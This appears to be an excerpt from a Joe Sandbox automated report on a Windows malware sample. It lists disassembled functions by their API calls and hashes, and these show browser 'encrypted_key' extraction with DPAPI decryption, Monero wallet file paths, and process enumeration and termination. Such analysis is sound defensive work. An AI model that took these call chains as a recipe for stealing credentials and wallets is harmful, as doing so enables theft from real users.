                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen
                      • String ID:
                      • API String ID: 367037083-0
                      • Opcode ID: df943eacd92a1b0bc10ef7effec0c5f33747618258ac46ea734b89e146173fb5
                      • Instruction ID: a401023cc5657121996fc52df2ea977b3834e5aed451e30fab1370fde49d0c1f
                      • Opcode Fuzzy Hash: df943eacd92a1b0bc10ef7effec0c5f33747618258ac46ea734b89e146173fb5
                      • Instruction Fuzzy Hash: D7416271D10109EBCB04EFE4C865AEEBB74BF54305F10851AE81677290EB74A609CFA2
                      Function 00549CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                        • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                        • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                        • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                        • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                        • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                        • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00549D39
                        • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549AEF
                        • Part of subcall function 00549AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00544EEE,00000000,?), ref: 00549B01
                        • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549B2A
                        • Part of subcall function 00549AC0: LocalFree.KERNEL32(?,?,?,?,00544EEE,00000000,?), ref: 00549B3F
                        • Part of subcall function 00549B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00549B84
                        • Part of subcall function 00549B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00549BA3
                        • Part of subcall function 00549B60: LocalFree.KERNEL32(?), ref: 00549BD3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                      • String ID: $"encrypted_key":"$DPAPI
                      • API String ID: 2100535398-738592651
                      • Opcode ID: 6e6f7b32bbea068a383dfda10233e4394845f69b2a30467512d25d6de82af9ba
                      • Instruction ID: 2977a545f589fac0b55f417afe6e7a704eeb23ec91998af4afe6aff9a63ab577
                      • Opcode Fuzzy Hash: 6e6f7b32bbea068a383dfda10233e4394845f69b2a30467512d25d6de82af9ba
                      • Instruction Fuzzy Hash: 7F3144B5D10109ABCF14DFE4DC96EEF7BB8BF48304F144519E905A7241EB349A04CBA5
                      Function 005594D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 005594EB
                        • Part of subcall function 00558D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0055951E,00000000), ref: 00558D5B
                        • Part of subcall function 00558D50: RtlAllocateHeap.NTDLL(00000000), ref: 00558D62
                        • Part of subcall function 00558D50: wsprintfW.USER32 ref: 00558D78
                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 005595AB
                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 005595C9
                      • CloseHandle.KERNEL32(00000000), ref: 005595D6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                      • String ID:
                      • API String ID: 3729781310-0
                      • Opcode ID: 4b2d22210537b0c952ca94e534c35066dada4d8f818927a6e8de18b8ff188a22
                      • Instruction ID: 4bff82170f27304cb8d01bade7854c12514b4c2f8ca12b31bc89e52b6fbc95bd
                      • Opcode Fuzzy Hash: 4b2d22210537b0c952ca94e534c35066dada4d8f818927a6e8de18b8ff188a22
                      • Instruction Fuzzy Hash: B1311071940208EFDB14DBD0CD59BEDB774FF44301F20855AE906AA184EB789A49CB55
                      Function 00558680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005605B7), ref: 005586CA
                      • Process32First.KERNEL32(?,00000128), ref: 005586DE
                      • Process32Next.KERNEL32(?,00000128), ref: 005586F3
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • CloseHandle.KERNEL32(?), ref: 00558761
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                      • String ID:
                      • API String ID: 1066202413-0
                      • Opcode ID: 356f7bc12dadb726fdd310b7991dd0c256bff0c6dff9db9e61b7f3e3a46d0c34
                      • Instruction ID: 69418c66d48af56909c3f3ebe07d03f2d9dcaf19793ec767346d2dbd578380b9
                      • Opcode Fuzzy Hash: 356f7bc12dadb726fdd310b7991dd0c256bff0c6dff9db9e61b7f3e3a46d0c34
                      • Instruction Fuzzy Hash: 69316F71911119ABDB24DF50CC65FEEBB78FB49701F10429AE90AA21A0DB346A49CFA1
                      Function 00557980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00560E00,00000000,?), ref: 005579B0
                      • RtlAllocateHeap.NTDLL(00000000), ref: 005579B7
                      • GetLocalTime.KERNEL32(?,?,?,?,?,00560E00,00000000,?), ref: 005579C4
                      • wsprintfA.USER32 ref: 005579F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                      • String ID:
                      • API String ID: 377395780-0
                      • Opcode ID: a9ed31b1856eed6ea6ece2e161c329108f52c0b614767a9c24a38a1d88788f4b
                      • Instruction ID: 83dcc30871bcf1bd2f13c33be32feef1444f6ac2b1d1a96f59e62398c51665cd
                      • Opcode Fuzzy Hash: a9ed31b1856eed6ea6ece2e161c329108f52c0b614767a9c24a38a1d88788f4b
                      • Instruction Fuzzy Hash: 3C1118B2944118AADB149FC9DD45BBEBBF8FB4CB11F10411AF605A2280E23D5940CBB5
                      Function 0055C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • __getptd.LIBCMT ref: 0055C74E
                        • Part of subcall function 0055BF9F: __amsg_exit.LIBCMT ref: 0055BFAF
                      • __getptd.LIBCMT ref: 0055C765
                      • __amsg_exit.LIBCMT ref: 0055C773
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0055C797
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                      • String ID:
                      • API String ID: 300741435-0
                      • Opcode ID: dd9a5f26e514f1158d7bb8258088d4190c5543b1c26cfbccb7cdc3dc6615e3ff
                      • Instruction ID: 9075b19bca1c2e1648a47cb651a9ceb0be81e56fa4b7b0f54fc78a1d3ff9cfb6
                      • Opcode Fuzzy Hash: dd9a5f26e514f1158d7bb8258088d4190c5543b1c26cfbccb7cdc3dc6615e3ff
                      • Instruction Fuzzy Hash: E2F096329107129FE720BBB8581E7493FA0BF44717F14414FFC14A75D2DB6459489F56
                      Function 00554F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00554F7A
                      • lstrcat.KERNEL32(?,00561070), ref: 00554F97
                      • lstrcat.KERNEL32(?,01028BB8), ref: 00554FAB
                      • lstrcat.KERNEL32(?,00561074), ref: 00554FBD
                        • Part of subcall function 00554910: wsprintfA.USER32 ref: 0055492C
                        • Part of subcall function 00554910: FindFirstFileA.KERNEL32(?,?), ref: 00554943
                        • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
                        • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
                        • Part of subcall function 00554910: FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
                        • Part of subcall function 00554910: FindClose.KERNEL32(000000FF), ref: 00554B92
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                      • String ID:
                      • API String ID: 2667927680-0
                      • Opcode ID: 35b5f1682a6adc56160cad7ce8b1d0b1cd8f8343cd55b50636e63bea7d97e88e
                      • Instruction ID: c764d443fec126576a83e8c0cf76ee99363e59a14047bbfa82e47d8c3e9b7282
                      • Opcode Fuzzy Hash: 35b5f1682a6adc56160cad7ce8b1d0b1cd8f8343cd55b50636e63bea7d97e88e
                      • Instruction Fuzzy Hash: 6821DA7694020977D754FBB0DC5AEEE373CBB94300F008546B65A93181EE789ACC8FA6